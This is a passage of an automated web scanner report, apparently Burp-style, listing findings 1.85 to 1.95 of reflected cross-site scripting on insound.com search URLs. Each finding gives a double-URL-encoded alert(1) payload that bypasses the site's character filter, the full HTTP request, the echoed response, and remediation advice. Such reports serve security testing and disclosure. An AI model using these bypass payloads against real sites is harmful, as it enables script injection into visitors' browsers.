Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cappadonna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf78%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e36e33dc363 was submitted in the REST URL parameter 3. This input was echoed as daf78"><script>alert(1)</script>36e33dc363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cappadonnadaf78%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e36e33dc363&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n51q735nj96h1ja8u68c1t7kt2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=482592070; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=109046725; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cappadonnadaf78"><script>alert(1)</script>36e33dc363" />
...[SNIP]...

1.85. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsize%207&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92b586a2299 was submitted in the REST URL parameter 3. This input was echoed as 3d6d3"><script>alert(1)</script>92b586a2299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsize%2073d6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e92b586a2299&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=u2guejbqb7mgnkj12clmp0r3r4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=299855511; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=186472612; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capsize 73d6d3"><script>alert(1)</script>92b586a2299" />
...[SNIP]...

1.86. http://www.insound.com/search/query/Capsize%207&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsize%207&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b8434%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b88e3caf12 was submitted in the REST URL parameter 3. This input was echoed as b8434</title><script>alert(1)</script>8b88e3caf12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsize%207b8434%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b88e3caf12&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fsf9hpuu8d8t1emjj6ijr7f6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=389399160; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=300943266; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capsize 7b8434</title><script>alert(1)</script>8b88e3caf12</title>
...[SNIP]...

1.87. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsula&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e7af6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec37518ec6c6 was submitted in the REST URL parameter 3. This input was echoed as e7af6</title><script>alert(1)</script>c37518ec6c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsulae7af6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec37518ec6c6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fipgbhb04qsn1sjchn3eb7bmn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=399768520; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=293189086; expires=Sun, 09-Jan-2011 02:39:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capsulae7af6</title><script>alert(1)</script>c37518ec6c6</title>
...[SNIP]...

1.88. http://www.insound.com/search/query/Capsula&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capsula&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e9f620e9fc was submitted in the REST URL parameter 3. This input was echoed as bdd2c"><script>alert(1)</script>8e9f620e9fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capsulabdd2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8e9f620e9fc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ch7bc0g09e5l6qsopg0ntlers6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=396224894; expires=Sun, 09-Jan-2011 02:39:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=117160064; expires=Sun, 09-Jan-2011 02:39:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capsulabdd2c"><script>alert(1)</script>8e9f620e9fc" />
...[SNIP]...

1.89. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20&%20Tennille&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7afc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac64a0d37f6 was submitted in the REST URL parameter 3. This input was echoed as 7afc4</title><script>alert(1)</script>ac64a0d37f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%207afc4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eac64a0d37f6&%20Tennille&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=od08gncmlipbl02rcnp46rfdn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=288555421; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=540366421; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain 7afc4</title><script>alert(1)</script>ac64a0d37f6</title>
...[SNIP]...

1.90. http://www.insound.com/search/query/Captain%20&%20Tennille&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20&%20Tennille&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c169%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4dc65b368 was submitted in the REST URL parameter 3. This input was echoed as 6c169"><script>alert(1)</script>3a4dc65b368 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%206c169%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3a4dc65b368&%20Tennille&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=63380r8eb3k86hht056bb6a1v2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=288247081; expires=Sun, 09-Jan-2011 02:39:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=92387229; expires=Sun, 09-Jan-2011 02:39:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain 6c169"><script>alert(1)</script>3a4dc65b368" />
...[SNIP]...

1.91. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Ahab&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c5c92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1701caffcf was submitted in the REST URL parameter 3. This input was echoed as c5c92</title><script>alert(1)</script>a1701caffcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Ahabc5c92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1701caffcf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mnbdd2o6b95kokdolrfsdokg05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=310552625; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=132639303; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Ahabc5c92</title><script>alert(1)</script>a1701caffcf</title>
...[SNIP]...

1.92. http://www.insound.com/search/query/Captain%20Ahab&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Ahab&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4e1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7b6950ca20 was submitted in the REST URL parameter 3. This input was echoed as ca4e1"><script>alert(1)</script>a7b6950ca20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Ahabca4e1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7b6950ca20&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3cs4b0e1ionlkm9f6j94sh6sc7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=369877812; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=303795982; expires=Sun, 09-Jan-2011 02:39:48 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Ahabca4e1"><script>alert(1)</script>a7b6950ca20" />
...[SNIP]...

1.93. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d121%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e542a231f10c was submitted in the REST URL parameter 3. This input was echoed as 6d121"><script>alert(1)</script>542a231f10c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band6d121%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e542a231f10c&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=aeqnuo4t5mmognu4qj2m7483m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=252191286; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=532678477; expires=Sun, 09-Jan-2011 02:39:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Captain Beefheart and His Magic Band6d121"><script>alert(1)</script>542a231f10c" />
...[SNIP]...

1.94. http://www.insound.com/search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 1236d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb81f655e02b was submitted in the REST URL parameter 3. This input was echoed as 1236d</title><script>alert(1)</script>b81f655e02b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheart%20and%20His%20Magic%20Band1236d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb81f655e02b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3gns4cjijs0ovg1fv81lvfssv6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=513736123; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=528181852; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Captain Beefheart and His Magic Band1236d</title><script>alert(1)</script>b81f655e02b</title>
...[SNIP]...

1.95. http://www.insound.com/search/query/Captain%20Beefheart&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Captain%20Beefheart&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28100%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e13be6574f33 was submitted in the REST URL parameter 3. This input was echoed as 28100"><script>alert(1)</script>13be6574f33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Captain%20Beefheart28100%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e13be6574f33&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2a1oqpeum4packl24hdonsvtd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=247094540; expires=Sun, 09-Jan-2011 02:39:54 GMT; path=/; domain=.insound.com
